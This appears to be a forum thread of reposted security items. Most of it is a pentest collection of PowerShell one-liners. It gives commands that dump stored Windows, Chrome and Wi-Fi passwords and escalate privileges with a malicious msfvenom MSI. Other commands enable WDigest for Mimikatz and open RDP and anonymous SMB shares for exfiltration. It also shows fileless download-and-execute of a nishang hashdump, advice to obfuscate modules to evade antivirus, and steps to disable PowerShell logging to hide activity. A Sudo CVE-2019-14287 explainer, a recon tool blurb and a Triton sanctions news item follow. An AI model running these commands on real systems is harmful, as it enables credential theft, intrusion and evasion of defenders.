Get stored passwords from Windows Credential Manager Windows Credential Manager provides another mechanism of storing credentials for signing in to websites, logging in to remote systems and various applications and it also provides a secure way of using credentials in PowerShell scripts. With the following one-liner, we can retrieve all stored credentials from the Credential Manager using the CredentialManager PowerShell module: Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); } Similarly to PasswordVault, the credentials are stored in individual user profile locations and only the currently logged-in user can decrypt theirs: C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\ C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Credentials\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\ Dump passwords from Google Chrome browser The following command decrypts stored credentials from the Google Chrome browser, if it is installed and if there are any passwords stored: [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)) Note that this shows only the DPAPI decryption step: the $datarow variable has to be populated first by reading the encrypted password_value entries from Chrome’s “Login Data” SQLite database in the user profile. Since the data is protected with the CurrentUser scope, this has to be executed under the context of the target (victim) user. Get stored Wi-Fi passwords from Wireless Profiles With this command we can extract all stored Wi-Fi passwords (WEP, WPA PSK, WPA2 PSK etc.) 
from the wireless profiles that are configured in the Windows system: (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize Note that we have to have administrative privileges in order for this to work. Search for SNMP community string in registry The following command will extract the SNMP community string stored in the registry, if there is any: gci HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse -EA SilentlyContinue Finding an SNMP community string is not a critical issue, but it could be useful to: Understand what kind of password patterns are used among sysadmins in the organization Perform a password spraying attack (assuming that passwords might be re-used elsewhere) Search for string pattern in registry The following PowerShell command will sift through the selected registry hives (HKCR, HKCU, HKLM, HKU, and HKCC) and recursively search for any chosen pattern within the registry key names or data values. In this case we are searching for the “password” pattern: $pattern = "password" $hives = "HKEY_CLASSES_ROOT","HKEY_CURRENT_USER","HKEY_LOCAL_MACHINE","HKEY_USERS","HKEY_CURRENT_CONFIG" # Search in registry keys foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | sls "$pattern" } # Search in registry values foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | % { if((gp $_.PsPath -ea SilentlyContinue) -match "$pattern") { $_.PsPath; $_ | out-string -stream | sls "$pattern" }}} Although this could take a lot of time and produce a lot of noise, it will certainly find every occurrence of the chosen pattern in the registry. 
Privilege escalation The following sections contain PowerShell commands useful for privilege escalation attacks – for cases when we only have low privileged user access and we want to escalate our privileges to local administrator. Search registry for auto-logon credentials Windows systems can be configured to log in automatically upon boot, which is for example used on POS (point of sale) systems. Typically, this is configured by storing the username and password in a specific Winlogon registry location, in clear text. The following command will get the auto-logon credentials from the registry: gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*" Check if AlwaysInstallElevated is enabled If the following AlwaysInstallElevated registry keys are set to 1, it means that any low privileged user can install *.msi files with NT AUTHORITY\SYSTEM privileges. Here’s how to check it with PowerShell: gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated Note that both registry keys have to be set to 1 in order for this to work. An MSI installer package can be easily generated using the msfvenom utility from the Metasploit Framework. For instance, we can add ourselves into the administrators group: msfvenom -p windows/exec CMD='net localgroup administrators joe /add' -f msi > pkg.msi Find unquoted service paths The following PowerShell command will print out services whose executable path is not enclosed within quotes (“): gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name This can lead to privilege escalation in case the executable path also contains spaces and we have write permissions to any of the folders in the path. 
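To see why this is exploitable, here is a simplified model (in Python, purely for illustration; the path below is hypothetical) of how Windows resolves an unquoted service path: every space-separated prefix is tried, in order, as a candidate executable. The real lookup is done by the CreateProcess API, which also tries candidates with “.exe” appended.

```python
# Simplified model of unquoted service path resolution on Windows:
# each space is a potential end of the executable name, so every
# prefix is tried in order until one resolves to an existing binary.
path = r"C:\Program Files\My App\service.exe"  # hypothetical unquoted path

parts = path.split(" ")
candidates = [" ".join(parts[: i + 1]) for i in range(len(parts))]

for c in candidates:
    print(c)
# C:\Program
# C:\Program Files\My
# C:\Program Files\My App\service.exe
```

If we can drop our own binary at one of the earlier candidates (e.g. C:\Program.exe, given the “.exe” appending behavior), it gets executed with the privileges of the service account when the service starts.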
More details about this technique including exploitation steps can be found here or here. Check for LSASS WDigest caching Using the following command we can check whether WDigest credential caching is enabled on the system or not. This setting dictates whether we will be able to use Mimikatz to extract plaintext credentials from the LSASS process memory. (gp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest).UseLogonCredential If the value is set to 0, then the caching is disabled (the system is protected) If it doesn’t exist or if it is set to 1, then the caching is enabled Note that if it is disabled, we can still enable it using the following command, but we will also have to restart the system afterwards: sp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest -name UseLogonCredential -value 1 Credentials in SYSVOL and Group Policy Preferences (GPP) In corporate Windows Active Directory environments, credentials can sometimes be found stored in the Group Policies, in various custom scripts or configuration files on the domain controllers in the SYSVOL network shares. Since the SYSVOL network shares are accessible to any authenticated domain user, we can easily identify if there are any stored credentials using the following command: Push-Location \\example.com\sysvol gci * -Include *.xml,*.txt,*.bat,*.ps1,*.psm,*.psd -Recurse -EA SilentlyContinue | select-string password Pop-Location One typical example is MS14-025 with the cPassword attribute in the GPP XML files. The “cpassword” attribute can be instantly decrypted into a plaintext form e.g. by using the gpp-decrypt utility in Kali Linux. Network related commands Here are a few network-related PowerShell commands that can be useful particularly during internal network penetration tests and similar exercises. 
Set MAC address from command-line Sometimes it can be useful to set the MAC address on a network interface and with PowerShell we can easily do it without using any 3rd party utility: Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D" This can be useful e.g. when we are testing for NAC (network access control) bypass and other things. Allow Remote Desktop connections This command trio can be useful when we want to connect to the system using a graphical RDP session, but it is not enabled for some reason: # Allow RDP connections (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1) # Disable NLA (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) # Allow RDP on the firewall Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True Now the port tcp/3389 should be open and we should be able to connect without a problem e.g. by using the xfreerdp or rdesktop tools from Kali Linux. Host discovery using mass DNS reverse lookup Using this command we can perform a quick reverse DNS lookup on the 10.10.1.0/24 subnet and see if there are any resolvable (potentially alive) hosts: $net = "10.10.1." 0..255 | foreach {$r=(Resolve-DNSname -ErrorAction SilentlyContinue $net$_ | ft NameHost -HideTableHeaders | Out-String).trim().replace("\s+","").replace("`r","").replace("`n"," "); Write-Output "$net$_ $r"} | tee ip_hostname.txt The results will then be saved in the ip_hostname.txt file in the current working directory. Sometimes this can be faster and more covert than a pingsweep or similar techniques. 
Port scan a host for interesting ports Here’s how to quickly port scan a specified IP address (10.10.15.232) for 39 selected interesting ports: $ports = "21 22 23 25 53 80 88 111 139 389 443 445 873 1099 1433 1521 1723 2049 2100 2121 3299 3306 3389 3632 4369 5038 5060 5432 5555 5900 5985 6000 6379 6667 8000 8080 8443 9200 27017" $ip = "10.10.15.232" $ports.split(" ") | % {echo ((new-object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip"} 2>$null This will give us quick situational awareness about a particular host on the network using nothing but pure PowerShell. Port scan a network for a single port (port-sweep) This could be useful for example for quickly discovering SSH interfaces (port tcp/22) on a specified network Class C subnet (10.10.0.0/24): $port = 22 $net = "10.10.0." 0..255 | foreach { echo ((new-object Net.Sockets.TcpClient).Connect($net+$_,$port)) "Port $port is open on $net$_"} 2>$null If you are trying to identify just Windows systems, change the port to 445. Create a guest SMB shared drive Here’s a cool trick to quickly start an SMB (CIFS) network shared drive accessible by anyone: new-item "c:\users\public\share" -itemtype directory New-SmbShare -Name "sharedir" -Path "C:\users\public\share" -FullAccess "Everyone","Guests","Anonymous Logon" To stop it afterwards, execute: Remove-SmbShare -Name "sharedir" -Force This could come in handy for transferring files, exfiltration etc. Whitelist an IP address in Windows firewall Here’s a useful command to whitelist an IP address in the Windows firewall: New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123 Now we should be able to connect to this host from our IP address (10.10.15.123) on every port. 
After we are done with our business, remove the rule: Remove-NetFirewallRule -DisplayName "pentest" Other useful commands The following commands can be useful for performing various administrative tasks, for gathering information about the system, or for using additional PowerShell functionalities that can be useful during a pentest. File-less download and execute Using this tiny PowerShell command we can easily download and execute arbitrary PowerShell code that is hosted remotely – either on our own machine or on the Internet: iex(iwr("https://URL")) iwr = Invoke-WebRequest iex = Invoke-Expression The remote content will be downloaded and loaded without touching the disk (file-less). Now we can just run it. We can use this for any number of popular offensive modules, e.g.: https://github.com/samratashok/nishang https://github.com/PowerShellMafia/PowerSploit https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/EmpireProject/Empire (modules here) Here’s an example of dumping local password hashes (hashdump) using the nishang Get-PassHashes module: iex(iwr("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1"));Get-PassHashes Very easy, but note that this will likely be flagged by any decent AV or EDR. In cases like this, you could obfuscate the modules you want to use and host them somewhere yourself. 
Get SID of the current user The following command will return the SID value of the current user: ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value Check if we are running with elevated (admin) privileges Here’s a quick one-liner for checking whether we are running an elevated PowerShell session with Administrator privileges: If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "yes"; } else { echo "no"; } Disable PowerShell command logging By default, PowerShell automatically logs up to 4096 commands in the history file, much like Bash does on Linux. The PowerShell history file is a plaintext file located in each user’s profile in the following location: C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt With the following command(s) we can disable the PowerShell command logging functionality in the current shell session: Set-PSReadlineOption –HistorySaveStyle SaveNothing or Remove-Module PSReadline This can be useful in red team exercises if we want to minimize our footprint on the system. From now on, no command will be recorded in the PowerShell history file. Note however that the above command(s) will still be echoed in the history file, so be aware that this is not completely covert. List installed antivirus (AV) products Here’s a simple PowerShell command to query the Security Center and identify all installed antivirus products on this computer: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct By decoding the productState value, we can identify which AV is currently enabled (in case there is more than one installed), whether the signatures are up-to-date, and even which AV features and scanning engines are enabled (e.g. real-time protection, anti-spyware, auto-update etc.). This is however quite an esoteric topic without a simple solution. 
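Since there is no simple official way to decode productState, here is a hedged sketch (in Python, for illustration only) of the commonly cited unofficial interpretation: viewed as six hex digits, the middle byte indicates whether the product is enabled and the low byte whether its signatures are up to date. Treat the exact bit meanings as an assumption, not documented behavior:

```python
# Unofficial, commonly cited heuristic for decoding the WMI
# AntiVirusProduct.productState value (assumption, not documented):
# viewed as 6 hex digits, the middle byte signals "enabled"
# (0x10/0x11) and the low byte "signatures up to date" (0x00).
def decode_product_state(state: int) -> dict:
    h = f"{state:06x}"
    return {
        "enabled": h[2:4] in ("10", "11"),
        "up_to_date": h[4:6] == "00",
    }

# 397568 == 0x061100 is a value often reported for an enabled,
# up-to-date product:
print(decode_product_state(397568))  # {'enabled': True, 'up_to_date': True}
```

Cross-check the result against the vendor's own status reporting before relying on it.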
Here are some links on the topic: https://mspscripts.com/get-installed-antivirus-information-2/ https://jdhitsolutions.com/blog/powershell/5187/get-antivirus-product-status-with-powershell/ https://stackoverflow.com/questions/4700897/wmi-security-center-productstate-clarification/4711211 https://docs.microsoft.com/en-us/windows/win32/api/iwscapi/ne-iwscapi-wsc_security_product_state https://social.msdn.microsoft.com/Forums/pt-BR/6501b87e-dda4-4838-93c3-244daa355d7c/wmisecuritycenter2-productstate Conclusion Hope you find this collection useful during your pentests. Please leave a comment with YOUR favorite one-liner. For other interesting commands, check out our pure PowerShell infosec reference or have a look at our collection of minimalistic offensive security tools on GitHub. Source: infosecmatter.com
  19. Over the past few days, news of CVE-2019-14287 — a newly discovered open source vulnerability in Sudo, Linux’s popular command tool — has been grabbing quite a few headlines. Since vulnerabilities in widespread and established open source projects can often cause a stir, we decided to present you with a quick cheat sheet to let you know exactly what the fuss is about. Here is everything you need to know about the Sudo vulnerability, how it works, and how to handle the vulnerable Sudo component if you find that you are currently at risk. Why Is The New Sudo Security Vulnerability (CVE-2019-14287) Making Waves? Let’s start with the basics. Sudo is a program dedicated to the Linux operating system, or any other Unix-like operating system, and is used to delegate privileges. For example, it can be used by a local user who wants to run commands as root — the Windows equivalent of an admin user. On October 14, the Sudo team published a security alert about CVE-2019-14287, a new security issue discovered by Joe Vennix of Apple Information Security, in all Sudo versions prior to version 1.8.28. The security flaw could enable a malicious user to execute arbitrary commands as the root user even in cases where root access is disallowed. Considering how widespread Sudo usage is among Linux users, it’s no surprise that everybody’s talking about the security vulnerability. The Sudo Vulnerability Explained That’s the scary version, and when we think about how powerful and popular Sudo is, CVE-2019-14287 should not be ignored. That said, it’s also important to note that the vulnerability is only relevant in a specific configuration of the Sudo security policy, called “sudoers”, which helps ensure that privileges are limited only to specific users. 
The issue occurs when a sysadmin inserts an entry into the sudoers file, for example: jacob myhost = (ALL, !root) /usr/bin/chmod This entry means that user jacob is allowed to run “chmod” as any user except the root user, meaning a security policy is in place in order to limit access — sounds good, right? Unfortunately, Joe Vennix from Apple Information Security found that the function fails to parse all values correctly, and when given the user id “-1” or its unsigned equivalent “4294967295”, the command will run as root, bypassing the security policy entry we set in the example above. In the example below, when we run with the “-1” user ID, we get the id number “0”, which is the root user value: Stay Secure: Keep Calm And Update Your Sudo Version And now for some good news: the Sudo team has already released a secure version, so if you are using this particular security configuration, make sure to update to version 1.8.28 or later. In addition, as you can see, the Sudo vulnerability only occurs in a very specific configuration. As is often the case when newly disclosed security vulnerabilities in popular open source projects make a splash, there’s no need to panic. While Sudo is an extremely popular and widely used project, the vulnerability is only relevant in a specific scenario, and it has already been fixed in the updated version. Our best advice is to keep calm, and make sure you update your open source software components. Via whitesourcesoftware.com
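A quick note on where the magic numbers in this bug come from: uid_t is effectively a 32-bit unsigned integer, so -1 and 4294967295 are the same bit pattern. A minimal Python illustration (for demonstration only, not part of the original write-up):

```python
# User id -1 and 4294967295 are the same 32-bit pattern:
uid = -1 & 0xFFFFFFFF
print(uid)  # 4294967295
assert uid == 2**32 - 1

# The setresuid() family treats an id of -1 as "leave unchanged";
# since sudo itself already runs as root, "unchanged" means uid 0
# (root), which is how the Runas restriction gets bypassed.
```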
  20. https://octopus.com/blog/public-bug-bounty
  21. dude, there are at least 10 hybrid cars in a town with a few k inhabitants; you could wrap them in cells until the next station
  22. Kev

    EasyRecon

    EasyRecon is a script that does the initial reconnaissance of a target automatically. To scan Google, simply run: $ ./easyRecon.sh google.com Setup To install EasyRecon, clone this repository. EasyRecon relies on a couple of tools, so make sure you have them installed: subfinder httprobe waybackurls As most of these tools are written in Go, make sure you have Go installed and configured properly. Make sure that when you type any of the above commands in the terminal, they are recognized and work. Usage $ ./easyRecon.sh example.com Features Enumerate all the existing domains with subfinder Separate live domains from all existing domains using httprobe Spider the target and save all the URLs of the target using waybackurls Grep all the JS files and endpoints from the target Download easyrecon-main.zip or git clone https://github.com/cspshivam/easyrecon.git Source
  23. “Petrochemical plant” The Treasury Department for the first time levied sanctions for an ICS cyberattack. (CC BY-NC-ND 2.0) The Treasury Department’s Office of Foreign Assets Control sanctioned a Russian government research institution linked to Triton malware targeting industrial safety systems, the first time the U.S. took such an action for an industrial control system attack. Treasury Secretary Steve Mnuchin called out the Russian government for continuing “to engage in dangerous cyber activities aimed at the U.S. and its allies.” The State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics built the tools behind a 2017 Triton attack on a petrochemical facility in the Middle East. The malware, also known as Trisis and Hatman, has been used against U.S. partners in the Middle East, and the agency said in a release that Triton hackers have been reportedly scanning and probing U.S. facilities. “An OFAC sanction by the U.S. Treasury is significant and compelling; not only will it impact this research institution in Russia, but anyone working with them will have their ability to be successful on the international stage severely hampered,” said Robert Lee, CEO and co-founder of Dragos, Inc. “The most important aspect of this development, however, is the attribution to Russia for the Trisis attack by the USG officially and the explicit call out of industrial control systems in the sanction,” said Lee. “This is a norm setting moment and the first time an ICS cyberattack has ever been sanctioned.” He called the sanction “entirely appropriate” since the cyberattack on the petrochemical facility “was the first ever targeted explicitly towards human life. We are fortunate no one died and I’m glad to see governments take a strong stance condemning such attacks.” Via scmagazine.com